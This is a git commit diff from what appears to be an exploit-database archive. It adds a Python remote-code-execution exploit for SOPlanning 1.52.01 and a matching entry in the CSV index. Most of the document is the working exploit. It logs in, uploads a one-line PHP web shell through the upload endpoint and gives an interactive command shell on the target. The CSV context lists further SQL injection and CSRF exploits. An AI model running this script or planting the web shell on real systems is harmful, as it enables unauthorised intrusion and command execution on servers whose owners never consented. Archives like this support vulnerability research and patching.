DB: 2024-11-16

2 changes to exploits/shellcodes/ghdb SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
2024-11-16 00:16:32 +00:00 · 2024-11-16 00:16:32 +00:00 · 773f5f480c
commit 773f5f480c
parent b86fb6e1b7
2 changed files with 77 additions and 0 deletions
--- a/exploits/php/webapps/52082.py
+++ b/exploits/php/webapps/52082.py
@ -0,0 +1,76 @@
+# Exploit Title: SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)
+# Date: 6th October, 2024
+# Exploit Author: Ardayfio Samuel Nii Aryee
+# Version: 1.52.01
+# Tested on: Ubuntu
+
+import argparse
+import requests
+import random
+import string
+import urllib.parse
+
+def command_shell(exploit_url):
+    commands = input("soplaning:~$ ")
+    encoded_command = urllib.parse.quote_plus(commands)
+
+    command_res = requests.get(f"{exploit_url}?cmd={encoded_command}")
+    if command_res.status_code == 200:
+        print(f"{command_res.text}")
+        return
+    print(f"Error: An erros occured while running command: {encoded_command}")
+
+def exploit(username, password, url):
+    target_url = f"{url}/process/login.php"
+    upload_url = f"{url}/process/upload.php"
+    link_id = ''.join(random.choices(string.ascii_lowercase + string.digits, k=6))
+    php_filename = f"{''.join(random.choices(string.ascii_lowercase + string.digits, k=3))}.php"
+
+    login_data = {"login":username,"password":password}
+    res = requests.post(target_url, data=login_data, allow_redirects=False)
+
+    cookies = res.cookies
+
+    multipart_form_data = {
+        "linkid": link_id,
+        "periodeid": 0,
+        "fichiers": php_filename,
+        "type": "upload"
+    }
+
+    web_shell = "<?php system($_GET['cmd']); ?>"
+
+    files = {
+    'fichier-0': (php_filename, web_shell, 'application/x-php')
+    }
+    upload_res = requests.post(upload_url, cookies=cookies,files=files, data=multipart_form_data)
+
+    if upload_res.status_code == 200 and "File" in upload_res.text:
+        print(f"[+] Uploaded ===> {upload_res.text}")
+        print("[+] Exploit completed.")
+        exploit_url = f"{url}/upload/files/{link_id}/{php_filename}"
+        print(f"Access webshell here: {exploit_url}?cmd=<command>")
+
+        if "yes" == input("Do you want an interactive shell? (yes/no) "):
+            try:
+                while True:
+                    command_shell(exploit_url)
+            except Exception as e:
+                raise(f"Error: {e}")
+        else:
+            pass
+
+
+def main():
+    parser = argparse.ArgumentParser(prog="SOplanning RCE", \
+            usage=f"python3 {__file__.split('/')[-1]} -t http://example.com:9090 -u admin -p admin")
+
+    parser.add_argument("-t", "--target", type=str, help="Target URL (e.g., http://localhost:8080)", required=True)
+    parser.add_argument("-u", "--username",type=str,help="username", required=True)
+    parser.add_argument("-p", "--password",type=str,help="password", required=True)
+
+    args = parser.parse_args()
+
+    exploit(args.username, args.password, args.target)
+
+main()
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -30275,6 +30275,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 48074,exploits/php/webapps/48074.txt,"SOPlanning 1.45 - 'by' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,http://www.exploit-db.comsoplanning-1-45.zip,
 48089,exploits/php/webapps/48089.txt,"SOPlanning 1.45 - 'users' SQL Injection",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,,
 48086,exploits/php/webapps/48086.txt,"SOPlanning 1.45 - Cross-Site Request Forgery (Add User)",2020-02-17,J3rryBl4nks,webapps,php,,2020-02-17,2020-02-17,0,,,,,,
+52082,exploits/php/webapps/52082.py,"SOPlanning 1.52.01 (Simple Online Planning Tool) - Remote Code Execution (RCE) (Authenticated)",2024-11-15,cybersploit,webapps,php,,2024-11-15,2024-11-15,0,,,,,,
 38478,exploits/php/webapps/38478.txt,"Sosci Survey - Multiple Vulnerabilities",2013-04-17,"T. Lazauninkas",webapps,php,,2013-04-17,2016-12-18,1,,,,,,https://www.securityfocus.com/bid/59278/info
 4282,exploits/php/webapps/4282.txt,"SOTEeSKLEP 3.5RC9 - 'file' Remote File Disclosure",2007-08-13,dun,webapps,php,,2007-08-12,,1,OSVDB-38454;CVE-2007-4369,,,,,
 41558,exploits/php/webapps/41558.txt,"Soundify 1.1 - 'tid' SQL Injection",2017-03-09,"Ihsan Sencan",webapps,php,,2017-03-09,2017-03-09,0,,,,,,